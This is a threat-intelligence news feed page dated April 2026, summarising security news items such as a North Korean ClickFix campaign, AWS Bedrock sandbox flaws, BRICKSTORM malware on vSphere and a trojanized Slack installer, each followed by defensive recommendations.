Stay informed with today's critical security updates
Every organisation is different. The free "Daily Pulse" feed shows the broader threat landscape.
Want this specific and tailored to your organisation?
ThreatInsights – Click for more infoThe Daily Pulse is refreshed automatically every day at 9:00 AM GMT
Want to learn more about Cyber Threat Intelligence?
Check out our free online self-paced training course.
Start Learning NowFriday, April 17, 2026
Frontier AI advancements by OpenAI and Anthropic are leading to enhanced AI-native cyber defense technologies, such as those offered by SentinelOne, which operates at machine speed and global scale.
The integration of frontier AI into cybersecurity solutions represents a significant evolution in threat detection and response capabilities. Organizations adopting these technologies can better protect themselves against increasingly sophisticated cyber threats, making this a critical area of focus for security teams.
Evaluate and consider integrating AI-native security solutions to enhance your organization's cyber defense mechanisms.
Friday, April 17, 2026
North Korean threat actor Sapphire Sleet is utilizing ClickFix malware to target macOS users through deceptive job offers and fake Zoom updates, which are designed to steal credentials and sensitive information.
This campaign poses a significant risk to macOS users, particularly professionals who may be targeted through socially engineered tactics. Organizations should be aware of the potential for data theft and credential compromise, which can lead to broader security incidents.
Implement email filtering solutions to detect and block phishing attempts, and educate users on identifying suspicious messages and updates.
Friday, April 17, 2026
Unit 42 has identified critical vulnerabilities within the AWS Bedrock AgentCore's sandbox, particularly highlighting issues related to DNS tunneling and credential exposure. These vulnerabilities allow potential attackers to escape the sandbox environment, creating security risks.
The exposure of credentials and the ability to perform DNS tunneling can lead to unauthorized access and data exfiltration. Organizations using AWS Bedrock may be at risk of significant data breaches and compromised security, necessitating immediate attention from security teams.
Security teams should assess their AWS Bedrock implementations for these vulnerabilities and implement monitoring solutions to detect unusual DNS activity and credential leaks.
Friday, April 17, 2026
The BRICKSTORM malware targets the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors, allowing threat actors to establish long-term persistence beneath the guest operating systems. This approach exploits weak security architectures and identity management designs, bypassing traditional security measures.
Compromising the VCSA grants attackers administrative control over all managed ESXi hosts and virtual machines, significantly increasing the risk of data exfiltration and operational disruption. Organizations leveraging vSphere must recognize that these attacks can lead to severe security incidents, especially for critical infrastructure and sensitive assets.
Implement the Mandiant vCenter Hardening Script to enforce security configurations at the Photon Linux layer, thereby strengthening defenses against BRICKSTORM and similar threats.
Friday, April 17, 2026
The UK has classified Xinbi Guarantee as an enabler of crypto scams and human trafficking, yet Telegram continues to host this entity without taking action. This ongoing presence raises alarms about the platform's role in facilitating illicit activities.
The lack of action against Xinbi Guarantee poses risks to users and the broader financial ecosystem, allowing scams to proliferate and potentially resulting in significant financial losses. Security teams should be concerned as this situation highlights vulnerabilities in communication platforms that could be exploited for malicious purposes.
Security teams should monitor communications on platforms like Telegram for signs of illicit activities and consider implementing stricter user verification processes to mitigate risks.
Friday, April 17, 2026
A trojanized Slack installer masquerades as a legitimate download, granting attackers remote access to users' desktops without detection. This covert access enables them to steal credentials and sensitive data.
The attack poses a significant risk to individuals and organizations, as it can lead to unauthorized access to sensitive information and accounts. Security teams should be particularly concerned due to the potential for widespread exploitation of users trusting the Slack application.
Implement strict software verification processes and educate users on downloading applications only from official sources.
Friday, April 17, 2026
A large-scale malvertising campaign was detected by Microsoft in December 2024, affecting nearly one million devices worldwide. The attack originated from illegal streaming websites that used malvertising redirectors to deliver initial access payloads hosted on GitHub, marking the beginning of a modular and multi-stage attack chain.
This campaign poses a significant risk to organizations and individuals, as it can lead to the theft of sensitive information from affected devices. Security teams should be particularly concerned about the widespread impact and potential for data breaches stemming from such coordinated attacks.
Security teams should immediately implement measures to block access to known malicious sites and monitor for unusual activities on devices to mitigate the risk of infection.
Friday, April 17, 2026
Unit 42 reports a rise in attacks targeting Kubernetes environments, with threat actors exploiting identities and critical vulnerabilities to gain unauthorized access to cloud infrastructures.
These escalating attacks pose significant risks to organizations relying on Kubernetes for cloud management, potentially leading to data breaches and operational disruptions. Security teams must be vigilant as such threats can compromise sensitive data and undermine customer trust.
Implement strict identity and access management controls, regularly review permissions, and apply security patches to mitigate identified vulnerabilities in Kubernetes environments.
Friday, April 17, 2026
Internal emails indicate that a conservative legal group has been orchestrating complaints against media figures, specifically targeting Jimmy Kimmel and his team, leveraging connections with FCC chairman Brendan Carr's office.
This situation highlights the potential for politically motivated attacks against individuals in the media, which can lead to increased censorship and suppression of free speech. Security teams should be aware of how such threats can evolve and affect their organization's reputation and operational security.
Implement monitoring for politically motivated harassment or threats against employees, and establish protocols for responding to such incidents.
Friday, April 17, 2026
The article discusses the enhanced features of Browser Guard, which now includes Access Control for managing permissions. Users can specify which websites are allowed to access sensitive features such as the camera, microphone, and location, as well as control notifications.
This development is significant as it empowers users to mitigate risks associated with unauthorized access to personal data by malicious websites. Security teams should be concerned about potential exploitation of such features if not properly managed, leading to privacy breaches or data leaks.
Encourage users to review and tighten their browser permissions regularly to safeguard against unwanted access to sensitive information.